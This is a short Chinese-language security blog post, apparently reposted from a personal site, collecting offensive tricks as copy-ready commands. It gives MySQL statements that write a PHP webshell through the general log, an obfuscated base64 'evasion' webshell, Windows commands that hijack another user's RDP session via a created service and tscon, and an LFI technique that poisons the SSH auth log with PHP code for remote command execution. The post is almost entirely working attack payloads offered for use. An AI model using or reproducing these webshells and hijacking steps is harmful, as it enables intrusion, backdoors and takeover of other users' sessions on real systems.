一些技巧

  • A+
所属分类:安全文章

from:https://evi1cg.me/


 SQL语句利用日志写shell

outfile被禁止,或者写入文件被拦截;

在数据库中操作如下:(必须是root权限)

  • show variables like '%general%';  #查看配置


  • set global general_log = on;  #开启general log模式


  • set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址


  • select '<?php eval($_POST[cmd]);?>'  #写入shell

SQL查询免杀shell的语句

  1. SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

windows切换其他登陆用户

查看用户:

  1. C:Windowssystem32>query user

  2. USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME

  3. administrator                             1  Disc            1  3/12/2017 3:07 PM

  4. >localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM


  5. C:Windowssystem32>

创建服务:

  1. C:Windowssystem32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"

  2. [SC] CreateService SUCCESS

启动服务:

  1. net setart sesshijack

LFI SSH日志

登陆SSH:

  1. ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105

包含文件:

  1. http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls


本文始发于微信公众号(关注安全技术):一些技巧

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: